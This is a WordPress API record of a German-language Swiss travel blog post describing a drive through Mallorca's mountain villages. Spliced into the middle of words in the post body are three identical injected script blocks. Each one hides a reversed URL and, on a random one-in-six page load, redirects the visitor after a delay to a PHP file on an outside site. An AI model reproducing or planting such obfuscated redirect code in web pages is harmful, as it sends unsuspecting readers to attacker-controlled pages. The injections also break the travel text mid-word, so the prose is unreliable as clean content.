{"id":969,"date":"2012-12-26T10:25:38","date_gmt":"2012-12-26T09:25:38","guid":{"rendered":"http:\/\/www.zasi.ch\/sblog\/?p=969"},"modified":"2013-02-13T11:37:07","modified_gmt":"2013-02-13T10:37:07","slug":"inselerkundung-bei-milden-temparaturen","status":"publish","type":"post","link":"https:\/\/www.zasi.ch\/sblog\/index.php\/archives\/969","title":{"rendered":"Inselerkundung bei milden Temparaturen (Mallorca)"},"content":{"rendered":"<p>Mallorca ist ja nun wirklich eine kleine Insel, hat aber viel zu bieten. So machen wir uns auf den Weg und steuern Valldemossa an, wobei wir hier nicht etwa die grossen Verbindungsstrassen ber\u00fccksichtigen, wir schlagen den Weg \u00fcber\u00a0<a title=\"Calvi\u00e0, Mallorca\" href=\"http:\/\/de.wikipedia.org\/wiki\/Calvi%C3%A0\" target=\"_blank\">Calvi\u00e0<\/a> mit der Ma1014 ein. Was f\u00fcr eine Strasse, viele Kehrtwendungen, hoch auf 437 m.\u00fc.M. und dann ist die Fahrbahn maximal 1.5 au<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>tobreit. Unglaublich, da sind die Strassen bei uns in den Schweizer Bergd\u00f6rfern schon fast Au<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>tobahnen \ud83d\ude42<\/p>\n<p>In Calvi\u00e0 ist Markt und wir schlendern bei Sonne und gem\u00fctlicher Stimmung durch die Gassen und setzen uns in ein Caf\u00e9.<\/p>\n<p>Weiter geht&#8217;s nach <a title=\"Valldemossa, Mallorca\" href=\"http:\/\/de.wikipedia.org\/wiki\/Valldemossa\" target=\"_blank\">Valldemossa<\/a>, wo sich schon etliche Ber\u00fchmtheiten eine Auszeit geg\u00f6nnt haben. So wird beispielsweise mit Michael Douglas geworben. Valldemossa ist klein, in den Bergen gelegen und doch auch <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>touristisch, einfach zur jetzigen Jahreszeit eher ruhig und gem\u00fctlich.<\/p>\n<p>Der Port Valldemosso ist 5,8 km weiter entfernt und hier hinunter f\u00fchrt nun wirklich eine Serpentinenstrasse wie sie enger und kantiger wohl kaum sein kann. Wir sind froh, bloss einen wirklich kleinen Wagen zu haben. Der Hafen ist ein verschlafenes Fischerd\u00f6rfchen mit einem Restaurant und ca. 25 &#8211; 35\u00a0 H\u00e4usern und einfach schlicht nichts los.<\/p>\n<p>Auch die Ortschaften <a title=\"S\u00f3ller, Mallorca\" href=\"http:\/\/de.wikipedia.org\/wiki\/S%C3%B3ller\" target=\"_blank\">S\u00f3ller <\/a>und <a title=\"Deia, Mallorca\" href=\"http:\/\/de.wikipedia.org\/wiki\/Dei%C3%A0\" target=\"_blank\">Dei\u00e0 <\/a>haben ihre Geschichten, so hat in S\u00f3ller einst Frederic Chopin mit seiner Geliebten George Sande gelebt und hier die ber\u00fchmte Komposition &#8222;der Regen&#8220; geschrieben.<\/p>\n<p>Nach einer ausf\u00fchrlichen Runde durch die Schluchten im S\u00fcdosten Mallorcas kehren wir nach Palma zur\u00fcck und geniessen dann den fr\u00fchlingshaften Abend.<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Mallorca ist ja nun wirklich eine kleine Insel, hat aber viel zu bieten. So machen wir uns auf den Weg und steuern Valldemossa an, wobei wir hier nicht etwa die grossen Verbindungsstrassen ber\u00fccksichtigen, wir schlagen den Weg \u00fcber\u00a0Calvi\u00e0 mit der Ma1014 ein. Was f\u00fcr eine Strasse, viele Kehrtwendungen, hoch auf 437 m.\u00fc.M. und dann ist&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[853],"tags":[1716,895,896,897,839,898,1710,888,894,1715],"_links":{"self":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/posts\/969"}],"collection":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/comments?post=969"}],"version-history":[{"count":3,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/posts\/969\/revisions"}],"predecessor-version":[{"id":1166,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/posts\/969\/revisions\/1166"}],"wp:attachment":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/media?parent=969"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/categories?post=969"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/tags?post=969"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}